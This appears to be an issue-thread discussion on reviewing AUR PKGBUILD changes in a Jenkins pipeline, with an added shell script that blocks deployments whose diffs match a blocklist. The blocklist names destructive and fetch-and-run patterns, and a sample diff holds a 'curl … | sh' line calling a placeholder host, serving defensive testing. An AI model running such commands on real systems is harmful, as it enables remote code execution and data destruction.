I don't know how advanced pacman's hooks are. Ideally, each package stores the PKGBUILD it was built with in some directory (maybe under /var) and we have a preinstall hook in place that diffs the new PKGBUILD against whatever is stored there, showing the diff (and asking for confirmation?). This is the only way there can be any kind of trust in the repository, as currently we are building PKGBUILDs that are maintained by heaven knows whom, and this person could cause any kind of damage in their PKGBUILD/install file.
The diff should also include all files/patches/artifacts that are stored in the package's git repository...
An easy implementation would be to have the git repo cloned under /var/ and pull it in the preinstall hook, then use git diff between the revisions.
Jenkins takes care of pulling from the AUR repos, so it should be easy to display a diff here against the last build. A diff in that sense would be a git diff between the old job run and the new one. I don't think any pacman hooks are required here.
I don't like the idea of asking for confirmation; that would break the CD process. The package should always be built without manual interaction.
A sort of white/blacklist that scans the diff and stops the deployment would be okay (e.g. grep for rm -rf).
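One way to implement the blocklist gate over the git diff that the two comments above describe, as an added example that is not code from this project; the patterns, the function names and the sample diff are assumptions:

```shell
#!/bin/sh
# Added example, not the project's code: a pre-deploy gate for the PKGBUILD
# diff proposed above. Only ADDED lines of a unified diff are checked (leading
# '+', minus the '+++' header); any hit stops the deployment, no confirmation
# prompt. Patterns are assumptions and crude: "rm -rf" also flags cleanup lines.

# Blocklist: one extended regex per line.
PKGBUILD_BLOCKLIST='rm[[:space:]]+-[a-zA-Z]*(r[a-zA-Z]*f|f[a-zA-Z]*r)
curl[^|]*[|][[:space:]]*(ba)?sh
wget[^|]*[|][[:space:]]*(ba)?sh
chmod[[:space:]]+[0-7]*[4-7][0-7]{3}
/etc/sudoers
base64[[:space:]]+(-d|--decode)'

# scan_diff: read a unified diff on stdin, print each added line that hits
# the blocklist, return 1 on any hit and 0 when the diff is clean.
scan_diff() {
    added=$(grep '^[+]' | grep -v '^[+][+][+]' | sed 's/^[+]//')
    found=$(printf '%s\n' "$PKGBUILD_BLOCKLIST" | while IFS= read -r pat; do
        [ -n "$pat" ] || continue
        printf '%s\n' "$added" | grep -E -- "$pat" | while IFS= read -r line; do
            printf 'BLOCKED [%s]: %s\n' "$pat" "$line"
        done
    done)
    [ -z "$found" ] && return 0
    printf '%s\n' "$found"
    return 1
}

# Jenkins use: diff the last successful build's revision against the freshly
# pulled one across all files, so patches and .install scripts count too.
scan_git_revisions() {
    git diff "$1" "$2" | scan_diff
}

# Constructed sample diff (not a real AUR package); two additions should fail.
SAMPLE_DIFF='--- a/PKGBUILD
+++ b/PKGBUILD
@@ -2,4 +2,6 @@
-pkgver=1.0
+pkgver=1.1
 package() {
+  curl -s https://example.invalid/setup.sh | sh
+  rm -rf "$pkgdir"/usr/share/doc
   install -Dm644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
 }'

if printf '%s\n' "$SAMPLE_DIFF" | scan_diff; then echo "diff clean: deploy"
else echo "blocklisted change found: deployment stopped"; fi
```

In the Jenkins job, `scan_git_revisions <last-good-rev> <new-rev>` in the build step makes the job fail before anything is deployed, which keeps the CD pipeline free of manual prompts.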
@noctux requested something like this. What do we want to show here? The diff between the last run and now? The last successful build?